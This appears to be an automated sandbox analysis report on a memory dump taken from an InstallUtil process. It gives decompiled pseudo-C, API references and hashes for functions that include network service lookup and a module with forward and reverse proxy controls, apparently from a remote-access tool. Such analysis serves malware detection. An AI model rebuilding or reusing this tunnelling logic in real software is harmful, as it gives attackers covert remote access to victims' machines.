0x00448ccd
0x00448cd7
0x00448cd7
0x00448cb5
0x00448cb1
0x00448c9c
0x00448c6f
0x00448c6b
0x00448c52
0x00448c26
0x00448c1e
0x00448cdd
0x00448ce3
0x00448ce5
0x00448d58
0x00448d58
0x00448d5c
0x00448d6c
0x00448d72
0x00448d74
0x00448dd0
0x00448dd0
0x00448dd8
0x00448dd9
0x00448ddb
0x00448df4
0x00448df7
0x00448d34
0x00448d35
0x00000000
0x00448d3a
0x00448dfd
0x00000000
0x00448dfd
0x00448de2
0x00448ded
0x00000000
0x00448ded
0x00448d76
0x00448d79
0x00448d7c
0x00000000
0x00000000
0x00448d7e
0x00448d7e
0x00448d81
0x00448d84
0x00448d87
0x00448d8e
0x00448d93
0x00448d95
0x00448d99
0x00448db4
0x00448db8
0x00448db9
0x00448dbc
0x00448dbd
0x00448dc9
0x00448dbf
0x00448dbf
0x00448dbf
0x00448d9b
0x00448d9b
0x00448d9b
0x00448da6
0x00448dab
0x00448dae
0x00448dae
0x00000000
0x00448d93
0x00448cea
0x00448ced
0x00448cf4
0x00448cf9
0x00000000
0x00000000
0x00448d02
0x00448d08
0x00448d0a
0x00000000
0x00000000
0x00448d0c
0x00448d10
0x00000000
0x00000000
0x00448d24
0x00448d2a
0x00448d2c
0x00448d50
0x00448d53
0x00000000
0x00448d53
0x00448d2e
0x00000000
0x00448baa
0x00448baf
0x00448bba
0x00448d3b
0x00448d3b
0x00448d3b
0x00448d3e
0x00448d3f
0x00000000
0x00448d47
0x00448ba8
0x00448b5d
0x00448b62
0x00448b69
0x00448b6f
0x00000000
0x00448b6f
0x00448b37
0x00448b3a
0x00448b44
0x00448b44
0x00448b47
0x00448b4a
0x00000000
0x00448b4a
0x00448b3e
0x00448b40
0x00448b42
0x00000000
0x00000000
0x00000000
0x00448b42
0x00448aee
0x00448af3
0x00448afb
0x00000000
0x00448a86
0x00448a8b
0x00448a8e
0x00448a93
0x00448e20
0x00000000
0x00448e20

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41964ce1470a2d3a8d13c70f1d78a363870feb6cf36e7fd5b17cae898fe57565
Instruction ID: 52c02689ad14ce7649d6abddb2f94c6dec0276f26ec20c86b4e8b81c949368ea
Opcode Fuzzy Hash: 41964ce1470a2d3a8d13c70f1d78a363870feb6cf36e7fd5b17cae898fe57565
Instruction Fuzzy Hash: 63C106B4E043499FEB11DFA9C841BAEBBB0BF19314F14409EE450A7392CB789D41CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0044FAF4 Relevance: 13.8, APIs: 9, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0044FAF4(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = E004427A6(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E004427A6(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E004421F7(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00452F00();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E004421F7(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00452F00();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E0044466F(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E00432753(_t130);
													}
												}
											}
										}
									}
								}
								E00432753(_t100);
							}
						}
					}
				}
				L63:
				return E004318FB(_v8 ^ _t132);
			}

0x0044fafc
0x0044fb03
0x0044fb0b
0x0044fb0e
0x0044fb14
0x0044fb17
0x0044fb1a
0x0044fb1e
0x0044fb21
0x0044fb26
0x0044fb4d
0x00000000
0x00000000
0x00000000
0x00000000
0x0044fb28
0x0044fb30
0x0044fb32
0x0044fb36
0x0044fb36
0x0044fb3b
0x0044fb59
0x00000000
0x00000000
0x00000000
0x00000000
0x0044fb3d
0x0044fb46
0x0044fb5b
0x0044fb5b
0x0044fb60
0x0044fb67
0x0044fb6a
0x0044fb6a
0x0044fb6f
0x0044fb7b
0x0044fb88
0x0044fb95
0x0044fba8
0x00000000
0x0044fbaa
0x0044fbac
0x0044fbdf
0x00000000
0x0044fbe1
0x0044fbe3
0x0044fbe7
0x0044fbed
0x0044fbf0
0x0044fbf2
0x0044fbf5
0x0044fbf5
0x0044fbfa
0x00000000
0x00000000
0x0044fbfc
0x0044fc00
0x0044fc0a
0x0044fc0f
0x00000000
0x0044fc11
0x00000000
0x0044fc11
0x0044fc0f
0x00000000
0x0044fc00
0x0044fbf5
0x0044fbf0
0x00000000
0x0044fbe7
0x0044fbae
0x0044fbb0
0x0044fbb4
0x0044fbba
0x0044fbbd
0x0044fbbf
0x0044fbbf
0x0044fbc4
0x00000000
0x00000000
0x0044fbc6
0x0044fbca
0x0044fbd4
0x0044fbd9
0x00000000
0x0044fbdb
0x00000000
0x0044fbdb
0x0044fbd9
0x00000000
0x0044fbca
0x0044fbbf
0x0044fbbd
0x00000000
0x0044fbb4
0x0044fbac
0x0044fb97
0x0044fb97
0x0044fb97
0x00000000
0x0044fb97
0x0044fb8a
0x0044fb8a
0x0044fb8c
0x0044fb7d
0x0044fb7d
0x0044fb7f
0x0044fb7f
0x0044fc16
0x0044fc16
0x0044fc16
0x0044fc23
0x0044fc29
0x0044fc2e
0x0044fb4f
0x0044fc34
0x0044fc34
0x0044fc3c
0x0044fc40
0x0044fc9b
0x0044fc9d
0x00000000
0x0044fc42
0x0044fc47
0x0044fc49
0x0044fc4b
0x0044fc53
0x0044fc77
0x0044fc7c
0x0044fc81
0x0044fc87
0x00000000
0x0044fc8d
0x0044fc8d
0x00000000
0x0044fc8d
0x0044fc55
0x0044fc57
0x0044fc5b
0x0044fc60
0x0044fc62
0x0044fc67
0x0044fd7c
0x0044fd7c
0x0044fc6d
0x0044fc6d
0x0044fc93
0x0044fc93
0x0044fc96
0x0044fca0
0x0044fca2
0x00000000
0x0044fca8
0x0044fcb0
0x0044fcbe
0x00000000
0x0044fcc4
0x0044fccd
0x0044fcd3
0x0044fcd8
0x00000000
0x0044fcde
0x0044fcde
0x0044fce1
0x0044fce6
0x0044fcea
0x0044fd36
0x00000000
0x0044fcec
0x0044fcf1
0x0044fcf3
0x0044fcf5
0x0044fcfd
0x0044fd1a
0x0044fd24
0x0044fd26
0x0044fd29
0x00000000
0x0044fd2b
0x0044fd2b
0x00000000
0x0044fd2b
0x0044fcff
0x0044fd01
0x0044fd05
0x0044fd0a
0x0044fd0e
0x0044fd70
0x0044fd70
0x0044fd10
0x0044fd10
0x0044fd31
0x0044fd31
0x0044fd38
0x0044fd3a
0x00000000
0x0044fd53
0x0044fd53
0x0044fd6c
0x0044fd6c
0x0044fd3a
0x0044fd0e
0x0044fcfd
0x0044fd74
0x0044fd79
0x0044fcd8
0x0044fcbe
0x0044fca2
0x0044fc67
0x0044fc53
0x0044fd80
0x0044fd86
0x0044fc2e
0x0044fb6f
0x0044fb3b
0x0044fd88
0x0044fd9b

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044FDCD,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044FBA0
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044FDCD,00000000,00000000,?,00000001,?,?,?,?), ref: 0044FC23
__alloca_probe_16.LIBCMT ref: 0044FC5B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044FDCD,?,0044FDCD,00000000,00000000,?,00000001,?,?,?,?), ref: 0044FCB6
__alloca_probe_16.LIBCMT ref: 0044FD05
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044FDCD,00000000,00000000,?,00000001,?,?,?,?), ref: 0044FCCD

Part of subcall function 004421F7: RtlAllocateHeap.NTDLL(00000000,00431BAF,?,?,00435157,?,?,?,?,?,0040B882,00431BAF,?,?,?,?), ref: 00442229

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044FDCD,00000000,00000000,?,00000001,?,?,?,?), ref: 0044FD49
__freea.LIBCMT ref: 0044FD74
__freea.LIBCMT ref: 0044FD80

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: 46d9acc365897a445313a6b8e0c3c4e6d771333686758fe8883d7c6313b8f423
Instruction ID: aeb5f0c32eeed422b84e7d2e18918e31ff4b46808557f580d2f1ef4b3bcc4035
Opcode Fuzzy Hash: 46d9acc365897a445313a6b8e0c3c4e6d771333686758fe8883d7c6313b8f423
Instruction Fuzzy Hash: A8910471E006469AEB208E64CC91EEFBBB5EF49354F14417AE801EB281D72CDC49C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00411EE3 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00411EE3(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				intOrPtr _v0;
				char _v4;
				signed int _v8;
				signed short _v12;
				signed int _v16;
				signed int _v20;
				signed short _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _t70;
				signed short _t81;
				signed int _t82;
				signed short _t85;
				signed short _t86;
				void* _t88;
				signed int _t97;
				signed char _t99;
				void* _t100;
				signed int _t107;
				signed short _t108;
				signed int _t110;
				signed int _t116;
				signed int* _t118;
				signed int _t119;
				signed int _t120;
				intOrPtr _t121;

				_t110 = _a8;
				_t99 = 0;
				_t120 = _a4;
				_t97 = 0;
				_v28 = 0;
				_v16 = 0;
				_v32 = 0;
				_v4 = 0;
				_v12 = 0;
				_v24 = 0;
				_v8 = 0;
				_v20 = 0;
				_t119 = 0;
				_t118 = _a16;
				 *_t118 = 0;
				if(_t120 != 0 || _t110 != 0) {
					_t70 = _a12;
					__eflags = _t70;
					if(_t70 == 0) {
						L20:
						_a16 = _t97;
						__eflags = _t110;
						if(_t110 == 0) {
							L40:
							__eflags = _t120;
							if(_t120 == 0) {
								__eflags = _v28 & 0x00000001;
								_t100 = 0;
								_t72 =  !=  ? _t100 : 0x7f000001;
								__imp__#8(0x7f000001);
								_t121 =  !=  ? _t100 : 0x7f000001;
								L47:
								_t73 = E00411C46(_t97, _v20, __eflags, _v36, _t121);
								 *_t118 = _t73;
								__eflags = _t73;
								if(_t73 != 0) {
									__eflags = _v0 - _t119;
									if(_v0 == _t119) {
										L54:
										__eflags = _v28;
										if(_v28 == 0) {
											L57:
											return _t119;
										}
										_t119 = E00411E6A(_v24,  *_t118);
										__eflags = _t119;
										if(_t119 == 0) {
											goto L57;
										}
										L56:
										E00411EA8(_t73,  *_t118);
										 *_t118 =  *_t118 & 0x00000000;
										__eflags =  *_t118;
										goto L57;
									}
									 *_t73 =  *_t73 | 0x00000004;
									__eflags = _v32 & 0x00000002;
									if((_v32 & 0x00000002) == 0) {
										goto L54;
									}
									__imp__#12(_t121);
									 *((intOrPtr*)( *_t118 + 0x14)) = E00411BC8(_t73);
									_t73 =  *_t118;
									__eflags =  *((intOrPtr*)(_t73 + 0x14)) - _t119;
									if( *((intOrPtr*)(_t73 + 0x14)) != _t119) {
										goto L54;
									}
									_t119 = 8;
									L53:
									__eflags = _t119;
									if(_t119 != 0) {
										goto L56;
									}
									goto L54;
								}
								_t119 = 8;
								goto L56;
							}
							__eflags = E00411C00(_t120,  &_v4);
							if(__eflags != 0) {
								_t121 = _v4;
								goto L47;
							}
							_t73 = _v28;
							__eflags = _t73 & 0x00000004;
							if((_t73 & 0x00000004) == 0) {
								_push(_t118);
								_push(_t73 & 0x00000002);
								_push(_v32);
								_push(_v16);
								_t119 = E00411D5F(_t120, _t97);
								goto L53;
							}
							_t119 = 0x2af9;
							goto L56;
						}
						_t107 = E00438A88(_t99, _t110,  &_v12, 0xa) & 0x0000ffff;
						_t81 = _v12;
						_v32 = _t107;
						__eflags =  *_t81;
						if( *_t81 != 0) {
							__eflags = _t97;
							if(_t97 == 0) {
								L26:
								__imp__#55(_a8, "udp");
								__eflags = _t81;
								if(_t81 != 0) {
									_t85 =  *(_t81 + 8) & 0x0000ffff;
									_v28 = _t85;
									_t81 = _t85 & 0x0000ffff;
									_v40 = _t81;
								}
								L28:
								__eflags = _t97;
								if(_t97 == 0) {
									L30:
									__imp__#55(_v0, "tcp");
									_t116 = 1;
									__eflags = _t81;
									if(_t81 == 0) {
										L32:
										_t108 = _v24;
										_t82 = _v48;
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											__eflags = _t97;
											if(_t97 != 0) {
												goto L40;
											}
											__eflags = _t108;
											_t97 = (_t97 & 0xffffff00 | _t108 == 0x00000000) + 1;
											__eflags = _t108;
											if(_t108 == 0) {
												L39:
												_t48 =  &_v40;
												 *_t48 = _v40 & _t119;
												__eflags =  *_t48;
												goto L40;
											}
											__eflags = _v36 - _t119;
											if(_v36 == _t119) {
												goto L39;
											}
											_v40 = _t116;
											goto L40;
										}
										__eflags = _t97;
										_t84 =  !=  ? 0x277d : 0x2af9;
										return  !=  ? 0x277d : 0x2af9;
									}
									_t108 =  *(_t81 + 8) & 0x0000ffff;
									_t82 = _t108 & 0x0000ffff;
									_v48 = _t82;
									goto L33;
								}
								_t116 = 1;
								__eflags = _t97 - 1;
								if(_t97 != 1) {
									goto L32;
								}
								goto L30;
							}
							__eflags = _t97 - 2;
							if(_t97 != 2) {
								goto L28;
							}
							goto L26;
						}
						__imp__#9(_t107);
						_t86 = _t81 & 0x0000ffff;
						__eflags = _t97;
						_v24 = _t86;
						_v36 = _t86 & 0x0000ffff;
						_t88 = 1;
						_t97 =  ==  ? _t88 : _t97;
						__eflags = _a12;
						_v28 = 0 | _a12 == 0x00000000;
						goto L40;
					}
					__eflags =  *((intOrPtr*)(_t70 + 0x10)) - _t99;
					if( *((intOrPtr*)(_t70 + 0x10)) != _t99) {
						L23:
						return 0x2afb;
					}
					__eflags =  *((intOrPtr*)(_t70 + 0x14)) - _t99;
					if( *((intOrPtr*)(_t70 + 0x14)) != _t99) {
						goto L23;
					}
					__eflags =  *((intOrPtr*)(_t70 + 0x18)) - _t99;
					if( *((intOrPtr*)(_t70 + 0x18)) != _t99) {
						goto L23;
					}
					__eflags =  *((intOrPtr*)(_t70 + 0x1c)) - _t99;
					if( *((intOrPtr*)(_t70 + 0x1c)) != _t99) {
						goto L23;
					}
					_t99 =  *_t70;
					_v28 = _t99;
					__eflags = _t99 & 0x00000002;
					if((_t99 & 0x00000002) == 0) {
						L11:
						__eflags =  *((intOrPtr*)(_t70 + 4)) - _t97;
						if( *((intOrPtr*)(_t70 + 4)) == _t97) {
							L14:
							_t97 =  *(_t70 + 8);
							__eflags = _t97;
							if(_t97 == 0) {
								L19:
								_v16 =  *((intOrPtr*)(_t70 + 0xc));
								goto L20;
							}
							__eflags = _t97 - 1;
							if(_t97 == 1) {
								goto L19;
							}
							__eflags = _t97 - 2;
							if(_t97 == 2) {
								goto L19;
							}
							__eflags = _t97 - 3;
							if(_t97 == 3) {
								goto L19;
							}
							return 0x273c;
						}
						__eflags =  *((intOrPtr*)(_t70 + 4)) - 2;
						if( *((intOrPtr*)(_t70 + 4)) == 2) {
							goto L14;
						}
						return 0x273f;
					}
					__eflags = _t120;
					if(_t120 != 0) {
						goto L11;
					}
					return 0x2726;
				} else {
					return 0x2af9;
				}
			}

0x00411ee6
0x00411eea
0x00411eee
0x00411ef2
0x00411ef4
0x00411ef8
0x00411efc
0x00411f00
0x00411f04
0x00411f08
0x00411f0c
0x00411f10
0x00411f15
0x00411f18
0x00411f1c
0x00411f20
0x00411f30
0x00411f34
0x00411f36
0x00411fb1
0x00411fb1
0x00411fb5
0x00411fb7
0x004120b1
0x004120b1
0x004120b3
0x004120f6
0x00412102
0x00412103
0x00412107
0x0041210d
0x0041210f
0x0041211a
0x0041211f
0x00412121
0x00412123
0x0041212a
0x0041212e
0x0041215b
0x0041215b
0x00412160
0x0041217d
0x00000000
0x0041217d
0x0041216d
0x0041216f
0x00412171
0x00000000
0x00000000
0x00412173
0x00412175
0x0041217a
0x0041217a
0x00000000
0x0041217a
0x00412130
0x00412133
0x00412138
0x00000000
0x00000000
0x0041213b
0x0041214a
0x0041214d
0x0041214f
0x00412152
0x00000000
0x00000000
0x00412156
0x00412157
0x00412157
0x00412159
0x00000000
0x00000000
0x00000000
0x00412159
0x00412127
0x00000000
0x00412127
0x004120c0
0x004120c2
0x004120f0
0x00000000
0x004120f0
0x004120c4
0x004120c8
0x004120ca
0x004120d6
0x004120dc
0x004120dd
0x004120e3
0x004120ec
0x00000000
0x004120ec
0x004120cc
0x00000000
0x004120cc
0x00411fca
0x00411fd0
0x00411fd4
0x00411fd8
0x00411fdb
0x00412016
0x00412018
0x0041201f
0x00412028
0x0041202e
0x00412030
0x00412032
0x00412036
0x0041203a
0x0041203d
0x0041203d
0x00412041
0x00412041
0x00412043
0x0041204c
0x00412055
0x0041205d
0x0041205e
0x00412060
0x0041206f
0x0041206f
0x00412073
0x00412077
0x00412077
0x0041207a
0x00412090
0x00412092
0x00000000
0x00000000
0x00412094
0x0041209a
0x0041209b
0x0041209e
0x004120ad
0x004120ad
0x004120ad
0x004120ad
0x00000000
0x004120ad
0x004120a0
0x004120a5
0x00000000
0x00000000
0x004120a7
0x00000000
0x004120a7
0x0041207c
0x00412088
0x00000000
0x00412088
0x00412062
0x00412066
0x00412069
0x00000000
0x00412069
0x00412047
0x00412048
0x0041204a
0x00000000
0x00000000
0x00000000
0x0041204a
0x0041201a
0x0041201d
0x00000000
0x00000000
0x00000000
0x0041201d
0x00411fde
0x00411fe4
0x00411fe7
0x00411fe9
0x00411ff0
0x00411ff6
0x00411ff7
0x00411ffc
0x00412003
0x00000000
0x00412003
0x00411f38
0x00411f3b
0x0041200c
0x00000000
0x0041200c
0x00411f41
0x00411f44
0x00000000
0x00000000
0x00411f4a
0x00411f4d
0x00000000
0x00000000
0x00411f53
0x00411f56
0x00000000
0x00000000
0x00411f5c
0x00411f5e
0x00411f62
0x00411f65
0x00411f75
0x00411f75
0x00411f78
0x00411f8a
0x00411f8a
0x00411f8d
0x00411f8f
0x00411faa
0x00411fad
0x00000000
0x00411fad
0x00411f91
0x00411f94
0x00000000
0x00000000
0x00411f96
0x00411f99
0x00000000
0x00000000
0x00411f9b
0x00411f9e
0x00000000
0x00000000
0x00000000
0x00411fa0
0x00411f7a
0x00411f7e
0x00000000
0x00000000
0x00000000
0x00411f80
0x00411f67
0x00411f69
0x00000000
0x00000000
0x00000000
0x00411f26
0x00000000
0x00411f26

Strings

udp, xrefs: 0041201F
tcp, xrefs: 0041204C

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: e89efb45e4dd410997156192ae004f7025f315133890a8e52688e2807c50f323
Instruction ID: 7d6c78578f136db0db5ceb6428d566dd922d82de6985a768940b76d152640948
Opcode Fuzzy Hash: e89efb45e4dd410997156192ae004f7025f315133890a8e52688e2807c50f323
Instruction Fuzzy Hash: 337178306083029FD724CF15D6446ABBBE0AB98344F14452FFA85C7361E7B8CD96CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F07F Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040F07F(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v32;
				char _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v88;
				char _v92;
				void* _v96;
				char _v108;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t26;
				char* _t34;
				char* _t37;
				intOrPtr _t50;
				char* _t51;
				char* _t58;
				intOrPtr _t60;
				intOrPtr _t61;
				char* _t65;
				void* _t68;
				intOrPtr _t121;
				void* _t125;
				void* _t128;
				void* _t130;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t139;
				void* _t140;
				void* _t141;
				void* _t145;

				_t147 = __eflags;
				_t111 = __edx;
				_push(_t68);
				_t121 = _a4;
				E004020B6(_t68,  &_v76, __edx, __eflags, _t121 + 0xc);
				SetEvent( *(_t121 + 0x24));
				_t26 = E00401F6B( &_v80);
				E00404162( &_v80,  &_v56, 4, 0xffffffff);
				_t139 = (_t136 & 0xfffffff8) - 0x3c;
				E004020B6(0x46e260, _t139, _t111, _t147, 0x46e260);
				_t140 = _t139 - 0x18;
				E004020B6(0x46e260, _t140, _t111, _t147,  &_v72);
				E0041851D( &_v112, _t111);
				_t141 = _t140 + 0x30;
				_t125 =  *_t26 - 0x46;
				if(_t125 == 0) {
					E00401E25( &_v88, _t111, _t135, __eflags, 1);
					_t34 = E0040243C();
					E00401F6B(E00401E25( &_v92, _t111, _t135, __eflags, 1));
					_t112 = _t34;
					_t37 = E0040F872();
					_t127 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						_t128 = _t141 - 0x18;
						_push("1");
						L19:
						_t111 = E00402EF1( &_v32, E00401E25( &_v88, _t112, _t135, __eflags, 0), _t135, 0x46e260);
						E0040793B(0x46e260, _t128, _t39, _t121, _t135, __eflags);
						_push(0x85);
						E00404A78(_t121, _t39, __eflags);
						E00401F98();
						L20:
						E00401E4D( &_v108, _t111);
						E00401F98();
						E00401F98();
						return 0;
					}
					 *0x46dd34 = E0040FAE7(_t127, "StartForward");
					 *0x46dd30 = E0040FAE7(_t127, "StartReverse");
					 *0x46dd38 = E0040FAE7(_t127, "StopForward");
					_t50 = E0040FAE7(_t127, "StopReverse");
					_t112 = "GetDirectListeningPort";
					 *0x46dd40 = _t50;
					_t51 = E0040FAE7(_t127, "GetDirectListeningPort");
					__eflags =  *0x46dd34;
					 *0x46dd3c = _t51;
					if(__eflags == 0) {
						L17:
						_t128 = _t141 - 0x18;
						_push("2");
						goto L19;
					}
					__eflags =  *0x46dd30;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *0x46dd38;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags = _t51;
					if(__eflags == 0) {
						goto L17;
					}
					 *0x46dd01 = 1;
					E004020B6(0x46e260, _t141 - 0x18, "GetDirectListeningPort", __eflags, E00401E25( &_v88, "GetDirectListeningPort", _t135, __eflags, 0));
					_push(0x76);
					L10:
					E00404A78(_t121, _t112, __eflags);
					goto L20;
				}
				_t130 = _t125 - 1;
				if(_t130 == 0) {
					_t58 =  *0x46dd34(E004383EC(_t55, E00401F6B(E00401E25( &_v88, _t111, _t135, __eflags, 0))));
					_t145 = _t141 - 0x14;
					L9:
					_t112 = _t58;
					E004182D1(0x46e260, _t145, _t58);
					_push(0x77);
					goto L10;
				}
				_t131 = _t130 - 1;
				if(_t131 == 0) {
					_t60 =  *0x46dacc; // 0x0
					_t61 =  *((intOrPtr*)(_t60 + 0x18));
					__imp__#12( *((intOrPtr*)(_t61 + 4)));
					_t65 =  *0x46dd30(_t61, E004383EC(_t62, E00401F6B(E00401E25( &_v92, _t111, _t135, __eflags, 0))) & 0x0000ffff);
					__eflags = _t65;
					_t109 =  !=  ? 1 :  *0x46dd02 & 0x000000ff;
					 *0x46dd02 =  !=  ? 1 :  *0x46dd02 & 0x000000ff;
					_t112 = _t65;
					E004182D1(0x46e260, _t141 - 0x10, _t65);
					_push(0x78);
					goto L10;
				}
				_t133 = _t131 - 1;
				if(_t133 == 0) {
					_t58 =  *0x46dd38();
					_t145 = _t141 - 0x18;
					goto L9;
				}
				if(_t133 == 1) {
					 *0x46dd40();
					 *0x46dd02 = 0;
				}
				goto L20;
			}

0x0040f07f
0x0040f07f
0x0040f08c
0x0040f08f
0x0040f096
0x0040f09e
0x0040f0a8
0x0040f0bc
0x0040f0c1
0x0040f0cc
0x0040f0d1
0x0040f0db
0x0040f0e4
0x0040f0e9
0x0040f0ec
0x0040f0ef
0x0040f1ca
0x0040f1d1
0x0040f1e5
0x0040f1ea
0x0040f1ee
0x0040f1f3
0x0040f1f5
0x0040f1f7
0x0040f2a4
0x0040f2a6
0x0040f2ab
0x0040f2c3
0x0040f2c7
0x0040f2cd
0x0040f2d4
0x0040f2dd
0x0040f2e2
0x0040f2e6
0x0040f2ef
0x0040f2f8
0x0040f305
0x0040f305
0x0040f20e
0x0040f21f
0x0040f230
0x0040f237
0x0040f23c
0x0040f241
0x0040f248
0x0040f24d
0x0040f254
0x0040f259
0x0040f295
0x0040f298
0x0040f29a
0x00000000
0x0040f29a
